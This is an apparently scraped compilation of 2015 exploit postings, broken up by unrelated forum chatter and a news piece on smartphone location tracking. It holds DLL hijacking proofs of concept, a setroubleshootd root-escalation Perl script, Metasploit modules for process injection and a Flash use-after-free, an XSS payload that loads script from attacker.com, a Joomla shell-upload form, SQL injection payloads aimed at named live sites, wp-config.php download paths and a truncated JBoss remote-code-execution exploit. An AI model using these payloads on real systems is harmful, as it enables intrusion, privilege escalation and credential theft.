Aerosol

#[+] Author: TUNISIAN CYBER #[+] Exploit Title: UltraISO v9.6.2.3059 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Poc:http://i.imgur.com/naHAdJF.png #[+] Create Compile the file then rename it to daemon.dll then create .iso file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source

/* #[+] Author: TUNISIAN CYBER #[+] Exploit Title: BZR Player 1.03 DLL Hijacking #[+] Date: 29-03-2015 #[+] Type: Local Exploits #[+] Vendor: http://bzrplayer.blazer.nu/ #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] gcc -shared -o [DLLNAME_choose one from the lis below].dll tcyber.c # Copy it to the software dir. then execute the software , calc.exe will launch . #Vulnerable and Exploitable DLLs: output_dsound.dll codec_cdda.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tag.dll codec_cdda.dll codec_fsb.dll codec_vag.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_fsb.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_midi.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_vag.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll codec_.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll codec_oggvorbis.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll output_winmm.dll output_wasapi.dll output_asio.dll output_writer.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tremor.dll codec_tag.dll codec_cdda.dll codec_fsb.dll codec_vag.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_aiff.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_midi.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll codec_flac.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll codec_mod.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll codec_s3m.dll output_winmm.dll output_wasapi.dll output_asio.dll output_writer.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tag.dll codec_cdda.dll codec_fsb.dll output_winmm.dll codec_xm.dll codec_vag.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_it.dll codec_midi.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll codec_midi.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll codec_dls.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll output_wasapi.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll output_asio.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll output_winmm.dll output_writer.dll output_wasapi.dll output_asio.dll output_writer.dll output_writer_nrt.dll output_nosound.dll output_nosound_nrt.dll codec_tag.dll codec_cdda.dll codec_fsb.dll codec_vag.dll output_writer_nrt.dll codec_.dll codec_oggvorbis.dll codec_tremor.dll codec_aiff.dll codec_flac.dll codec_mod.dll codec_s3m.dll codec_xm.dll codec_it.dll codec_midi.dll output_nosound.dll codec_dls.dll codec_sf2.dll codec_asf.dll codec_playlist.dll codec_mpeg.dll dsp_oscillator.dll dsp_fft.dll dsp_lowpass.dll dsp_lowpass2.dll dsp_lowpass_simple.dll output_nosound_nrt.dll dsp_highpass.dll dsp_echo.dll dsp_delay.dll dsp_flange.dll dsp_tremolo.dll dsp_distortion.dll dsp_normalize.dll dsp_parameq.dll dsp_pitchshift.dll dsp_chorus.dll codec_tag.dll dsp_reverb.dll dsp_sfxreverb.dll dsp_itecho.dll dsp_compressor.dll dsp_dolbyheadphones.dll output_dsound.dll output_winmm.dll output_wasapi.dll output_asio.dll output_writer.dll #Proof of Concept (PoC): ======================= */ #include <windows.h> int tunisian() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { tunisian(); return 0; } Source

setroubleshoot tries to find out which rpm a particular file belongs to when it finds SELinux access violation reports. The idea is probably to have convenient reports for the admin which type enforcement rules have to be relaxed. setroubleshoot runs as root (although in its own domain). In util.py we have: 266 def get_rpm_nvr_by_file_path_temporary(name): 267 if name is None or not os.path.exists(name): 268 return None 269 270 nvr = None 271 try: 272 import commands 273 rc, output = commands.getstatusoutput("rpm -qf '%s'" % name) 274 if rc == 0: 275 nvr = output 276 except: 277 syslog.syslog(syslog.LOG_ERR, "failed to retrieve rpm info for %s" % name) 278 return nvr (and other similar occurences) So. Yes, thats correct: The SELinux system that is only there to protect you, passes attacker controlled data to sh -c (https://docs.python.org/2/library/commands.html) inside a daemon running as root. Sacken lassen... I attached a PoC which uses networkmanager's openvpn plugin to execute arbitraty commands by triggering an access violation to a pathname which contains shell commands. The setroubleshootd_t domain has quite a lot of allowed rules and transitions, so this can clearly count as privilege escalation. Furthermore a lot of admins run their system in permissive mode (full root) even when its shipped enforcing by default. Also note that there are potentially remote vectors, if attackers can control part of the filenames being created (web uploads, git, scp, ftp etc). Sebastian PS: I am all for SELinux but theres something on the wrong way. I counted the LOC, and the core SELinux (kernel) has a smaller codebase than whats framed around in python, running as root and mangling attacker controlled input. IOW, the system that wants to protect you has fewer code enforcing the rules than code that potentially blows up your system. And that code is python, so let alone all the python modules and interpreter hat can have bugs on its own. Driving such a lane _can only lead to abyss_. And I am not saying that evil powers are creating an overly complex system to better hide their bugdoors within. PPS: bug-logo will follow -- ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer () suse de - SuSE Security Team #!/usr/bin/perl # # Fedora21 setroubleshootd local root PoC # # (C) 2015 Sebastian Krahmer # # - requires polkit authorization to add/mod VPN connections # to NetworkManager (default on desktop user) # - after execution of this script, which adds appropriate # NM connection entries, try # # $ nmcli c up vpn-FOOBAR # # a couple of times, until you see: # # logger[4062]: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:setroubleshootd_t:... # # in the journalctl logs # # PS: I know in advance what the SELinux developers will say... # # I say: lulz! # create a pathname that setroubleshootd will eventually # query sh -c { rpm -qf ... with, fucking up ' escaping. So the # embedded pathname is then evaluated as command # # There goes your NSA-grade SELinux security!!! $file = "/tmp/foo.pem';`id|logger`;echo '"; open(O, ">", $file) or die $!; close O; # add connection system("nmcli c add type vpn ifname FOOBAR vpn-type openvpn"); open(O,"|nmcli c edit vpn-FOOBAR") or die $!; print O "set vpn.data ca = /tmp/foo.pem';`id|logger`;echo ', password-flags = 1, connection-type = password, remote = 1.2.3.4, username = FOOBAR\n"; print O "set vpn.secrets password=1\nsave\nquit\n"; close(O); print "Now do 'nmcli c up vpn-FOOBAR' and watch logs.\n"; Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local include Msf::Post::Windows::Runas include Msf::Post::Windows::Priv def initialize(info = {}) super(update_info(info, 'Name' => "Windows Run Command As User", 'Description' => %q{ This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default. Unless targetting a local user either set the DOMAIN, or specify a UPN user format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function. A custom command line can be sent instead of uploading an executable. APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine respectively. See the MSDN documentation for how these two values interact. }, 'License' => MSF_LICENSE, 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Kx499', 'Ben Campbell'], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86 ] } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431' ] ], 'DisclosureDate' => 'Jan 01 1999' # Not valid but required by msftidy )) register_options( [ OptString.new('DOMAIN', [false, 'Domain to login with' ]), OptString.new('USER', [true, 'Username to login with' ]), OptString.new('PASSWORD', [true, 'Password to login with' ]), OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)', nil ]), OptString.new('COMMAND_LINE', [false, 'Command line to execute (lpCommandLine)', nil ]), OptBool.new('USE_CUSTOM_COMMAND', [true, 'Specify custom APPLICATION_NAME and COMMAND_LINE', false ]) ], self.class) end def exploit fail_with(Exploit::Failure::BadConfig, 'Must be a meterpreter session') unless session.type == 'meterpreter' fail_with(Exploit::Failure::NoAccess, 'Cannot use this technique as SYSTEM') if is_system? domain = datastore['DOMAIN'] user = datastore['USER'] password = datastore['PASSWORD'] if datastore['USE_CUSTOM_COMMAND'] application_name = datastore['APPLICATION_NAME'] command_line = datastore['COMMAND_LINE'] else command_line = nil windir = get_env('windir') # Select path of executable to run depending the architecture case sysinfo['Architecture'] when /x86/i application_name = "#{windir}\\System32\\notepad.exe" when /x64/i application_name = "#{windir}\\SysWOW64\\notepad.exe" end end pi = create_process_with_logon(domain, user, password, application_name, command_line) return unless pi begin return if datastore['USE_CUSTOM_COMMAND'] vprint_status('Injecting payload into target process') raw = payload.encoded process_handle = pi[:process_handle] virtual_alloc = session.railgun.kernel32.VirtualAllocEx(process_handle, nil, raw.length, 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE') address = virtual_alloc['return'] fail_with(Exploit::Failure::Unknown, "Unable to allocate memory in target process: #{virtual_alloc['ErrorMessage']}") if address == 0 write_memory = session.railgun.kernel32.WriteProcessMemory(process_handle, address, raw, raw.length, 4) fail_with(Exploit::Failure::Unknown, "Unable to write memory in target process @ 0x#{address.to_s(16)}: #{write_memory['ErrorMessage']}") unless write_memory['return'] create_remote_thread = session.railgun.kernel32.CreateRemoteThread(process_handle, nil, 0, address, nil, 0, 4) if create_remote_thread['return'] == 0 print_error("Unable to create remote thread in target process: #{create_remote_thread['ErrorMessage']}") else print_good("Started thread in target process") end ensure session.railgun.kernel32.CloseHandle(pi[:process_handle]) session.railgun.kernel32.CloseHandle(pi[:thread_handle]) end end end Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player ByteArray With Workers Use After Free', 'Description' => %q{ This module exploits an use after free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, who can fill the memory and notify the main thread to corrupt the new contents. This module has been tested successfully on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.296. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery and exploit in the wild 'hdarwin', # Public exploit by @hdarwin89 (all the magic) 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-0313'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-02.html'], ['URL', 'http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2015-0313-the-new-flash-player-zero-day/'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :os_name => OperatingSystems::Match::WINDOWS_7, :ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^16\./ && ver == '16.0.0.296' }, :arch => ARCH_X86 }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Feb 02 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) b64_payload = Rex::Text.encode_base64(psh_payload) html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0313', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end Source

###################################################################### # Exploit Title: NASA.gov main-domain DOM-XSS # Date: 01/04/2015 # Author: Yann CAM - Georges TAUPIN @ Synetis - ASafety # Vendor or Software Link: www.nasa.gov # Version: / # Category: DOM-XSS # Google dork: # Tested on: NASA.gov main-domain ###################################################################### NASA description : ======================================================================================= The National Aeronautics and Space Administration (NASA) is the United States government agency responsible for the civilian space program as well as aeronautics and aerospace research. There are several sub-domains and independent projects within NASA. Those affected by this advisory are : - NASA’s video gallery on main domain : DOM Cross-Site Scripting (RXSS) Vulnerability description : ======================================================================================= Reflected DOM XSS are available in nasa.gov main-domain above. Through this kind of vulnerability, an attacker could tamper with page rendering, redirect victims to fake NASA portals, or capture NASA's users credentials such cookies. These reflected XSS are on GET variables and are not properly sanitized before being used in page. NASA’s main portal - video gallery - PoC : ======================================================================================= - Proof of Concept (PoC), canonical DOM-XSS "alert()", tested on Firefox 35, Chrome 39 and IE 11: http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3Dalert(/RXSS/) /> or the same fully-url-encoded : http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%2f%52%58%53%53%2f%29%20%2f%3e The previous link generates a JavaScript "alert()" box in the browser context. - Proof of Concept (PoC), canonical DOM-XSS "loading third party JS script", tested on Firefox 35, Chrome 39 and IE 11: http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3D"var s%3Ddocument.createElement('script');s.setAttribute('src','http://attacker.com/x.js');document.getElementsByTagName('head').item(0).appendChild(s);" /> Screenshots : ======================================================================================= - http://www.asafety.fr/data/20150124-NASA.gov-RXSS_001.png - http://www.asafety.fr/data/20150124-NASA.gov-RXSS_003.png - http://www.asafety.fr/data/20150124-NASA.gov-RXSS_004.png Solution: ======================================================================================= Fixed by NASA Portal's team. Additional resources : ======================================================================================= - http://www.nasa.gov/ - https://www.owasp.org/index.php/DOM_Based_XSS - http://www.asafety.fr/vuln-exploit-poc/contribution-nasa-gov-portail-principal-dom-xss - http://www.synetis.com Report timeline : ======================================================================================= 2015-01-25 : NASA Portal's team was alerted by email through "contact form". 2015-01-26 : NASA Portal's team fixed the vulnerability 2015-04-01 : Public advisory Credits : ======================================================================================= 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 www.synetis.com 8888 Consulting firm in management and information security Yann CAM - Georges TAUPIN - Security Consultants @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: www.synetis.com | www.asafety.fr | www.georgestaupin.com Source

###################################################################### # Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload # Google Dork: inurl:com_simplephotogallery # Date: 10.03.2015 # Exploit Author: CrashBandicot @DoSPerl # OSVDB-ID: 119624 # My Github: github.com/CCrashBandicot # Vendor Homepage: [url]https://www.apptha.com/[/url] # Software Link: [url]https://www.apptha.com/category/extension/joomla/simple-photo-gallery[/url] # Version: 1 # Tested on: Windows ###################################################################### # Vulnerable File : uploadFile.php # Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php 20. $fieldName = 'uploadfile'; 87. $fileTemp = $_FILES[$fieldName]['tmp_name']; 94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName; 96. if(! move_uploaded_file($fileTemp, $uploadPath)) # Exploit : <form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" > <input type="file" name="uploadfile"><br> <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br> <input type="submit" name="Submit" value="Pwn!"> </form> # Name of Shell Show you after Click on Pwn!, Name is random (eg : backdoor__FDSfezfs.php) # Shell Path : [url]http://localhost/backdoor__[/url][RandomString].php Source

Felicitari bre @Gecko, desi am avut unele divergente recunosc ca iti meriti rank-ul. ( ai demonstrat prin cunostiinte si implicarea in comunitate ) stiu cum erai inainte ca S.Mod si nu pot sa zic decat multa bafta.

Am primit ieri coletul.

Do you realize how often your smartphone is sharing your location data with various companies? It is more than 5000 times in just two weeks. That is little Shocking but True! A recent study by the security researchers from Carnegie Mellon reveals that a number of smartphone applications collect your location-related data — a lot more than you think. The security researcher released a warning against the alarming approach: "Your location [data] has been shared 5,398 times with Facebook, GO Launcher EX, Groupon and seven other [applications] in the last 14 days." During their study, researchers monitored 23 Android smartphone users for three weeks. First Week - Participants were asked to use their smartphone apps as they would normally do. Second Week - An app called App Ops was installed to monitor and manage the data those apps were using. Third Week - The team of researchers started sending a daily “privacy nudge” alert that would ping participants each time an app requested location-related data. Researchers concluded: Some apps for Android are tracking user's movements every three minutes. Some apps for Android are attempting to collect more data than it needed. Groupon, a deal-of-the-day app, requested one participant's coordinates 1,062 times in two weeks. Weather Channel, a weather report app, asked device location an average 2,000 times, or every 10 minutes. The participants were unaware of how closely they are being tracked by different apps, and many were surprised by the end results. Another participant wrote, "The number (356 times) was huge, unexpected." The research team found that privacy managing software helped manage access to data. When the members granted access to App Ops, they collectively checked their App permissions 51 times and restricted 272 permissions on 76 different apps. Just one of the participants failed to review permissions. As per users mentality, once the participants have made the changes to the app permission, they hardly looked at them after a few days. With the help of App Ops privacy app, in the span of eight days, the participants collectively reviewed app permissions 69 times, blocking 122 additional permissions on about 47 different apps. Ultimately, the team believes that if a user began getting the privacy nudges on a daily basis, they'll definitely go back to their privacy settings and restrict apps that are tracking users more closely. Source

###################################################################### # Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability # Google Dork: inurl:option=com_gallery_wd # Date: 29.03.2015 # Exploit Author: CrashBandicot (@DosPerl) # Vendor HomePage: http://web-dorado.com/ # Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd # Tested on: Windows ###################################################################### parameter 'theme_id' in GET vulnerable # Example : # Parameter: theme_id (GET) # Type: error-based # GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # ==================================================================================== # parameter 'image_id' in POST vulnerable # Example : # URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 # Parameter: image_id (POST) # Type: error-based # POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search # ~ Demo ~ # $> http://www.cnct.tg/ http://www.nswiop.nsw.edu.au/ http://cnmect.licee.edu.ro/ #EOF Source

###################################################################### # Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability # Google Dork: inurl:option=com_gallery_wd # Date: 29.03.2015 # Exploit Author: CrashBandicot (@DosPerl) # Vendor HomePage: http://web-dorado.com/ # Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd # Tested on: Windows ###################################################################### parameter 'theme_id' in GET vulnerable # Example : # Parameter: theme_id (GET) # Type: error-based # GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # ==================================================================================== # parameter 'image_id' in POST vulnerable # Example : # URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 # Parameter: image_id (POST) # Type: error-based # POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search #EOF Source

[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability [+]Author: TUNISIAN CYBER [+]Date: 29/03/2015 [+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker [+]Type:WebApp [+]Risk:High [+]Overview: Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability. [+]Proof Of Concept: 127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL Source

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip | [+] Tested on: Windows,Linux | | [+] Date : 2015-03-28 | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php | | [+] Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> | [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||* Source

# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380 # Software Link : Premium plugin # Dork Google: revslider.php "index of" # Date : 2014-07-24 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability ###################### # PoC http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source

/* #[+] Author: TUNISIAN CYBER #[+] Exploit Title: ZIP Password Recovery Professional 7.1 DLL Hijacking #[+] Date: 29-03-2015 #[+] Type: Local Exploits #[+] Vendor: http://www.recoverlostpassword.com/products/zippasswordrecovery.html#compare #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] gcc -shared -o dwmapi.dll tcyber.c # Copy it to the software dir. then execute the software , calc.exe will launch . Proof of Concept (PoC): ======================= */ #include <windows.h> int tunisian() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { tunisian(); return 0; } Source

#[+] Author: TUNISIAN CYBER #[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Vendor: https://httrack.com/page/2/fr/index.html #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source

/* * JBoss JMXInvokerServlet Remote Command Execution * JMXInvoker.java v0.3 - Luca Carettoni @_ikki * * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...). * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation" * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console" * and the "JMX Console" are protected or disabled. * * [FAQ] * * Q: Is my target vulnerable? * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable * * Q: How to fix it? * A: Enable authentication in "jmx-invoker-service.xml" * * Q: Is this exploit version-dependent? * A: Unfortunately, yes. An hash value is used to properly invoke a method. * At least comparing version 4.x and 5.x, these hashes are different. * * Q: How to compile and launch it? * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java * java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker * Yes, it's a Java exploit. I can already see some of you complaining.... */ import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.ObjectOutputStream; import java.lang.reflect.Array; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.net.ConnectException; import java.net.HttpURLConnection; import java.net.URL; import javax.management.MalformedObjectNameException; import javax.management.ObjectName; import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir) public class JMXInvokerServlet { //---------> CHANGE ME <--------- static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1 static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet"; static final String cmd = "touch /tmp/exectest"; //------------------------------- public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException { System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]"); //Create a malicious Java serialized object MarshalledInvocation payload = new MarshalledInvocation(); payload.setObjectName(new Integer(hash)); //Executes the MBean invoke operation Class<?> c = Class.forName("javax.management.MBeanServerConnection"); Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class); payload.setMethod(method); //Define MBean's name, operation and pars Object myObj[] = new Object[4]; //MBean object name myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer"); //Operation name myObj[1] = new String("createScriptDeployment"); //Actual parameters myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"}; //Operation signature myObj[3] = new String[]{"java.lang.String", "java.lang.String"}; payload.setArguments(myObj); System.out.println("\n--[*] MarshalledInvocation object created"); //For debugging - visualize the raw object //System.out.println(dump(payload)); //Serialize the object try { //Send the payload URL server = new URL(url); HttpURLConnection conn = 